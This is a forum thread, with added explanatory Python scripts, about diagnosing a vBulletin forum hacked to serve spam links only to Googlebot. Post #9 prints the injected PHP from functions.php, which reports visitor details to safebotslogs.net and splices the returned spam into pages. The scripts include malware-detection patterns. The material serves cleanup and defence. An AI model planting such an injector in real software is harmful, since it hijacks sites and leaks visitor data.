It seems my website has been hacked. Weird google cache hack.

  • Cobra SA
    Senior Member
    • May 2007
    • 203

    OK, so it seems my website has been hacked, but the weird thing is the hack only appears at the bottom of the Google cache of all my forum pages.

    http://webcache.googleusercontent.co...&ct=clnk&gl=en


    Without google cache I would never have noticed it.
    I don't know what the hackers changed.
    I searched the templates and found nothing.
    I searched the php files and found nothing.
    Even in the web source code of my pages there is nothing.

    Does anyone know what kind of hack this is and how to remove it?
    Last edited by Cobra SA; Tue 16 Aug '16, 8:55am.
  • glennybee
    Senior Member
    • Feb 2008
    • 1005
    • 3.7.x

    #2
    The links are on your /forums/index.php page too. I would open a ticket with your host if it's a managed server and ask them to check it out.

    Search the database in phpMyAdmin using keywords from the footer; it might be the result of a SQL injection. I can't think of anything else.


    • Cobra SA
      Senior Member
      • May 2007
      • 203

      #3
      Originally posted by glennybee
      The links are on your /forums/index.php page too. I would open a ticket with your host if it's a managed server and ask them to check it out.

      Search the database in phpMyAdmin using keywords from the footer; it might be the result of a SQL injection. I can't think of anything else.
      Good idea, I didn't think of searching the database, thanks.
      I just did a search on "xanax" and "clonazepam" but not a single result.

      I'll take your advice and open a ticket with my host. But if anyone knows this type of hack please let me know.


      • Alfa1
        Senior Member
        • Dec 2005
        • 4165
        • 3.8.x

        #4
        I would also consider whatever add-ons you have running, especially anything that concerns the footer. Try turning the hook system off.
        If that doesn't work, change all your passwords, contact your host, download a clean zip of vBulletin 3.8.4 and, after extracting, upload the files to your site. Check if that helps. If it does, then upgrade to the latest version.
        If it doesn't, I'd consider contacting IB.
        I buy 420 forums


        • Paul M
          Former Lead Developer
          vB.Com & vB.Org
          • Sep 2004
          • 9886

          #5
          Check your actual php (and js) files on the server.
          Baby, I was born this way


          • Cobra SA
            Senior Member
            • May 2007
            • 203

            #6
            Originally posted by Paul M
            Check your actual php (and js) files on the server.
            I have downloaded all the php, js, xml, html and ini files from my server.
            I opened them all at once in UltraEdit and searched them all for drug words like xanax, clonazepam... and UltraEdit didn't find a single match.

            Nothing in templates and phrases either.
            Last edited by Cobra SA; Tue 23 Nov '10, 3:00am.


            • Cobra SA
              Senior Member
              • May 2007
              • 203

              #7
              Just so you know, I will post the progress of my ticket with my host.

              Originally posted by Cobra SA
              Hello,

              My website has been hacked.
              The hack only appears in the footer of the Google cache of my website pages.

              http://webcache.googleusercontent.co...&ct=clnk&gl=en

              Without google cache I would never have noticed it.


              I don't know what the hackers changed or how they proceeded.
              I downloaded and searched all .php, .js, .xml, .html, .ini files and I found nothing related to drugs.

              Even in the web source code of my pages there is nothing, this is really strange.

              Please look into this; this is possibly a hack on the server side.

              Best regards,

              My Name.

              Originally posted by My host
              Hello,

              No, this is impossible. In this case it would affect all the server's accounts.

              If you can't find anything, please go to Google via the link http://www.google.com/webmasters/tools/ and request that Google rescan your page.

              Please let us know if you need more help.
              Thank you.

              - -
              Kind regards,
              Kenny ***
              My host
              I will now take their advice and ask Google to rescan. Will let you know how things are going.

              EDIT: ticket opened at google/webmasters; damn, they say it can take weeks, and they will not necessarily reply individually.
              Last edited by Cobra SA; Tue 23 Nov '10, 5:54am.


              • Cobra SA
                Senior Member
                • May 2007
                • 203

                #8
                Interesting thing to note: someone at the Google forums suggested that the code might only show up when the visitor is Googlebot, and it appears this is right; the Bing and Yahoo caches have no trace of the malicious code:

                http://cc.bingj.com/cache.aspx?q=mug...020bd,787e0e2c

                http://74.6.146.127/search/cache?ei=...IpnLrLd6W_Qg--

                Can that help me locate the malicious code? Maybe using the drugs as keywords to search for the malicious code was not the right strategy; maybe the malicious code inserts the drug links into my web page on the fly whenever Googlebot is visiting.

                Could anyone point me to how to look for the malicious code with this new information?
                Last edited by Cobra SA; Tue 16 Aug '16, 8:56am.

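The observation in post #8 (spam visible only to Googlebot, not to Bing or Yahoo) is classic cloaking: the server keys on the User-Agent header and serves a different body. One way to confirm it from outside, without knowing where the code lives, is to request the same page twice with different User-Agent strings and diff the bodies. The script below is an added example for this thread, not code from vBulletin or from any poster; the URL, user-agent strings and the spam vocabulary are assumptions.

```python
"""Cloaking check: request the same page as a normal browser and as Googlebot,
then report markup only the bot receives.  Added example for this thread, not
code from vBulletin or from any poster; the URL and user-agent strings below
are assumptions."""
import difflib
import re
import sys
import urllib.request

BROWSER_UA = ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/50.0 Safari/537.36")
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# Vocabulary typical of injected pharma/SEO spam; extend it with whatever the
# search-engine cache actually showed for your site.
SPAM = re.compile(r"<a\s[^>]*href=|xanax|clonazepam|viagra|cialis|casino|payday", re.I)


def fetch(url, user_agent, timeout=15):
    """GET url with a chosen User-Agent; the injected code keys on this header."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def normalise(html):
    """Neutralise things that legitimately differ between two requests
    (session hashes, CSRF tokens, vBulletin's query counter) so the diff
    only shows content differences."""
    html = re.sub(r"\b[0-9a-f]{32}\b", "SESSIONHASH", html)
    html = re.sub(r"""(securitytoken\s*=\s*)[^;"']+""", r"\1TOKEN", html, flags=re.I)
    html = re.sub(r"Executed <b>\d+</b> queries", "Executed <b>N</b> queries", html)
    return [line.strip() for line in html.splitlines() if line.strip()]


def bot_only_lines(browser_html, bot_html):
    """Lines present in the Googlebot response but absent from the browser one."""
    diff = difflib.unified_diff(normalise(browser_html), normalise(bot_html),
                                lineterm="", n=0)
    return [line[1:] for line in diff
            if line.startswith("+") and not line.startswith("+++")]


def suspicious(lines):
    """Keep only the bot-only lines that look like injected links or spam."""
    return [line for line in lines if SPAM.search(line)]


def check_url(url):
    """Suspicious bot-only lines for a live URL (needs network access)."""
    return suspicious(bot_only_lines(fetch(url, BROWSER_UA),
                                     fetch(url, GOOGLEBOT_UA)))


if __name__ == "__main__":
    for line in check_url(sys.argv[1]):
        print("bot-only:", line[:200])
```

Run it as `python cloakcheck.py http://example.invalid/forums/index.php`. Two caveats: a cloaker may also check the client address or reverse DNS, in which case a Googlebot User-Agent from your own workstation shows nothing, so "Fetch as Google" in Webmaster Tools (the link the host gave) remains the authoritative test; and a non-empty result tells you cloaking is happening, not where the code is, so the next step is still a file-level search.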

                • Cobra SA
                  Senior Member
                  • May 2007
                  • 203

                  #9
                  I checked the dates of the files on my FTP and one mainstream vB file is newer than all the other files, which is pretty suspicious.

                  The file is includes/functions.php and I don't see why its date is not the same as the other mainstream vB php files.

                  Besides, I found some code related to Googlebot inside. Is this normal code?

                  Code:
                      // This code use for global bot statistic
                      if(!(($nPos = strpos($vartext, '</body>')) === false) || !(($nPos = strpos($vartext, '</body>')) === false))
                      {
                          $sBonInfo = '';
                          $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
                          $stCurlHandle = NULL;
                          if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
                          {
                              if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics            
                              $stCurlHandle = curl_init('http://safebotslogs.net/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look'])); 
                          } else
                          {
                              if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics            
                              $stCurlHandle = curl_init('http://safebotslogs.net/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look'])); 
                          }
                          curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
                          $sBonInfo = curl_exec($stCurlHandle); 
                          curl_close($stCurlHandle); 
                          
                          $vartext = substr_replace($vartext, $sBonInfo, $nPos, 0);
                      } // Statistic code end
                      
                      $output = process_replacement_vars($vartext);
                  
                      if ($vbulletin->debug AND function_exists('memory_get_usage'))
                      {
                          $output = preg_replace('#(<!--querycount-->Executed <b>\d+</b> queries<!--/querycount-->)#siU', 'Memory Usage: <strong>' . number_format((memory_get_usage() / 1024)) . 'KB</strong>, \1', $output);
                      }


                  • Alfa1
                    Senior Member
                    • Dec 2005
                    • 4165
                    • 3.8.x

                    #10
                    That seems fishy. Others have experienced the same with code that referenced safebotslogs.net.
                    Now the question is: how did this get into your functions.php?

                    I'd change all your FTP passwords. Scan all computers that have FTP access to your site. Deny access to any PC that does not need to have access (white-listed IPs only).
                    Then download a fresh version of vB and upload that.
                    Upgrade to the latest vB3 version.
                    I buy 420 forums


                    • Paul M
                      Former Lead Developer
                      vB.Com & vB.Org
                      • Sep 2004
                      • 9886

                      #11
                      No, that is not normal, and certainly not part of vbulletin.
                      Baby, I was born this way

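Keyword searches for "xanax" failed here because the spam text never touches the disk: the block in post #9 fetches it from safebotslogs.net at request time and splices it in before `</body>`. Two checks that do not depend on the spam vocabulary are (1) the comparison against a clean copy of the same release that Alfa1 recommends, done by hash so modified, added and deleted files all stand out, and (2) a scan of the PHP tree for the behaviour itself: User-Agent sniffing, an outbound HTTP fetch, and locating `</body>` for splicing. The script below is an added example, not vBulletin code and not from any poster; the directory names treated as "expected to differ" are assumptions.

```python
"""Two checks for a vBulletin tree suspected of tampering: (1) compare every
file's SHA-256 against a clean extraction of the same release; (2) scan PHP
sources for the cloaking pattern seen in the thread.  Added example, not
vBulletin code; the expected-to-differ paths and indicator list are assumptions."""
import hashlib
import os
import re
import sys

# Files that legitimately differ from the distribution and would only add noise.
EXPECTED_DIFFERENT = ("includes/config.php",)
EXPECTED_PREFIXES = ("attachments/", "customavatars/", "customprofilepics/",
                     "signaturepics/")

# Behavioural indicators of search-engine cloaking / remote content injection.
INDICATORS = [
    ("user-agent sniffed for a search bot",
     re.compile(r"HTTP_USER_AGENT.{0,200}?(google|bing|yahoo|bot)", re.I | re.S)),
    ("outbound HTTP fetch from PHP",
     re.compile(r'''\b(curl_init|file_get_contents|fsockopen|fopen)\s*\(\s*["']https?://''', re.I)),
    ("position of </body> located for splicing",
     re.compile(r'''strpos\s*\(\s*\$\w+\s*,\s*["']</body>["']''', re.I)),
    ("decoded payload executed",
     re.compile(r"\b(eval|assert|create_function)\s*\(.{0,40}(base64_decode|gzinflate|gzuncompress|str_rot13)",
                re.I | re.S)),
]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root):
    """Map relative POSIX path -> sha256 for every file under root."""
    hashes = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            hashes[rel] = sha256_file(full)
    return hashes


def expected_to_differ(rel):
    return rel in EXPECTED_DIFFERENT or rel.startswith(EXPECTED_PREFIXES)


def compare_trees(live, clean):
    """live and clean map relative path -> digest.  A fresh upload overwrites the
    'modified' set, but does NOT remove the 'added' set, which is why added
    files need listing separately."""
    return {
        "modified": sorted(p for p in live
                           if p in clean and live[p] != clean[p] and not expected_to_differ(p)),
        "added": sorted(p for p in live if p not in clean and not expected_to_differ(p)),
        "missing": sorted(p for p in clean if p not in live),
    }


def scan_php_source(text):
    """Names of the indicators present in one PHP source text, in INDICATORS order."""
    return [name for name, pat in INDICATORS if pat.search(text)]


def scan_tree(root):
    """relative path -> matched indicator names, for PHP files under root."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".php", ".inc", ".phtml")):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as f:
                found = scan_php_source(f.read())
            if found:
                hits[os.path.relpath(full, root).replace(os.sep, "/")] = found
    return hits


if __name__ == "__main__":
    live_root, clean_root = sys.argv[1], sys.argv[2]
    report = compare_trees(hash_tree(live_root), hash_tree(clean_root))
    for kind, paths in report.items():
        for p in paths:
            print(kind, p)
    for p, names in scan_tree(live_root).items():
        print("indicators", p, "; ".join(names))
```

Run it as `python vbcheck.py /path/to/downloaded/forums /path/to/clean/upload` with the clean tree extracted from a vBulletin zip of the exact same version. A single indicator hit can be a false positive (a legitimate add-on may call `curl_init` on a remote URL), but a file matching the first three together is the pattern from post #9 and deserves a line-by-line look.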

                      • Cobra SA
                        Senior Member
                        • May 2007
                        • 203

                        #12
                        Do you think the hackers could have edited functions.php by means other than FTP access, like exploiting a security flaw in vB 3.8.4 or vBAdvanced 3.1.0?

                        I really can't find the slightest trace of malware on my system. It is fully scanned daily by KIS 2011 and Windows Defender, plus I always scan a new exe at virustotal.com before using it.


                        EDIT: My forum was hacked on 26/10/2010. I searched the Kaspersky logs and check this out.

                        Code:
                        26/10/2010 11:04:36    INSTALLFLASHPLAYER.EXE    Application Control        Application placed in group        Low Restricted    Heuristically calculated threat rating     
                        28/10/2010 11:19:35    INSTALLFLASHPLAYER.EXE    Application Control        Application placed in group        Trusted    Signed by the digital signature of entrusted manufacturers    
                        31/10/2010 16:04:30    INSTALLFLASHPLAYER.EXE    Application Control        Application placed in group        Low Restricted    Heuristically calculated threat rating
                        Stupid Kaspersky allowed that INSTALLFLASHPLAYER.EXE without a digital signature to execute. >_< You can see that on 28/10 another INSTALLFLASHPLAYER.EXE executed itself, but that one had a trusted digital signature.

                        Now the question is how to remove the trojans it may have installed if neither Kaspersky nor Windows Defender can detect them. I tried an online scan at BitDefender but it didn't find anything.
                        Last edited by Cobra SA; Wed 24 Nov '10, 12:20am.


                        • Cobra SA
                          Senior Member
                          • May 2007
                          • 203

                          #13
                          I found a trace of the hack in my FTP access log:

                          Mon Oct 25 09:50:39 2010 0 213.5.68.141 29421 /home/*domain*/public_html/forums/includes/cron/banners.php a _ i r *ftp-login* ftp 1 * c

                          I searched for the IP 213.5.68.141 and found two other people who got their FTP hacked by this IP.


                          I am currently asking my host to restrict my FTP access to my IP range and to ban that IP.

                          I will also ask google to blacklist http://safebotslogs.net
                          Last edited by Cobra SA; Wed 24 Nov '10, 4:54am.

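The line in post #13 is in xferlog format (the transfer log written by ProFTPD, Pure-FTPd and wu-ftpd): date, transfer time, client address, byte count, path, then one-letter fields for transfer type, special action, direction (`i` is an upload), access mode, then the user, service, and completion status. Triaging such a log by hand works for one line; for a month of entries it helps to parse them and flag what matters: transfers from addresses outside the range you actually work from, and uploads into directories that should only change during an upgrade. The script below is an added example for this thread, not from any poster; the allow-list range and the second sample line are constructed, the first sample line is the one quoted in the post.

```python
"""Triage an FTP transfer log (xferlog format) for transfers from clients
outside an IP allow-list and for uploads into code directories.  Added example
for this thread, not from any poster; the allow-list, the code-directory list
and the second sample line are constructed."""
import ipaddress
import re

# xferlog fields: date(5 tokens) transfer-secs client size path type(a/b)
# special-action direction(i=upload, o=download, d=delete) access-mode(a/g/r)
# user service auth-method auth-user-id completion(c/i)
XFERLOG = re.compile(
    r"^(?P<date>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) "
    r"(?P<secs>\d+) (?P<host>\S+) (?P<size>\d+) (?P<path>\S+) "
    r"(?P<type>[ab]) (?P<action>\S) (?P<direction>[iod]) (?P<mode>[arg]) "
    r"(?P<user>\S+) (?P<service>\S+) (?P<auth>[01]) (?P<authuser>\S+) "
    r"(?P<status>[ci])$"
)

# Writes here are code changes, not content; they should only happen during a
# deliberate upgrade from a known workstation (assumed list).
CODE_DIRS = ("/includes/", "/admincp/", "/modcp/", "/install/", "/clientscript/")

# First line is the one quoted in the thread; the second is constructed to show
# a benign upload from an allow-listed address (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = [
    "Mon Oct 25 09:50:39 2010 0 213.5.68.141 29421 /home/*domain*/public_html/forums/includes/cron/banners.php a _ i r *ftp-login* ftp 1 * c",
    "Mon Oct 25 10:12:01 2010 1 192.0.2.10 1024 /home/*domain*/public_html/forums/images/misc/logo.gif b _ i r *ftp-login* ftp 1 * c",
]


def parse_xferlog(line):
    """Dict of named fields for one xferlog line, or None if it does not parse."""
    m = XFERLOG.match(line.strip())
    return m.groupdict() if m else None


def flag_transfers(lines, allowed_cidrs, code_dirs=CODE_DIRS):
    """Return one finding per line that came from outside the allow-list or
    that wrote into (or deleted from) a code directory."""
    allowed = [ipaddress.ip_network(c) for c in allowed_cidrs]
    findings = []
    for line in lines:
        rec = parse_xferlog(line)
        if rec is None:
            continue  # malformed line; in real use count these separately
        reasons = []
        try:
            addr = ipaddress.ip_address(rec["host"])
            if not any(addr in net for net in allowed):
                reasons.append("client %s not in allow-list" % rec["host"])
        except ValueError:
            # Some servers log hostnames; treat them as unverified.
            reasons.append("client %s is a hostname, not an address" % rec["host"])
        if rec["direction"] in ("i", "d") and any(d in rec["path"] for d in code_dirs):
            verb = "upload" if rec["direction"] == "i" else "delete"
            reasons.append("%s in code directory" % verb)
        if reasons:
            findings.append({"when": rec["date"], "ip": rec["host"], "user": rec["user"],
                             "path": rec["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in flag_transfers(SAMPLE_LOG, ["192.0.2.0/24"]):
        print(f["when"], f["ip"], f["user"], f["path"], "; ".join(f["reasons"]))
```

Read against the quoted line, the fields also answer the question from post #12: the auth-method field is `1` and the status is `c`, a completed transfer by an authenticated session, so the attacker logged in with a working password rather than exploiting the forum software. Feed the script the full log from your host (`python ftptriage.py < xferlog` after swapping `SAMPLE_LOG` for `sys.stdin`) and every earlier or later write from 213.5.68.141 shows up in one pass.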

                          • Alfa1
                            Senior Member
                            • Dec 2005
                            • 4165
                            • 3.8.x

                            #14
                            It's always a good idea to only allow white-listed IPs to FTP, or to any other service that your members do not need. There are a mass of services that no one should have access to.
                            I assume you have changed all passwords and double checked all files on your server for irregularities?
                            I buy 420 forums


                            • Cobra SA
                              Senior Member
                              • May 2007
                              • 203

                              #15
                              The hacker added the file /forums/includes/cron/banners.php to my FTP. Is it possible it could have infected the database?
                              In that case, how can I clean up the database?
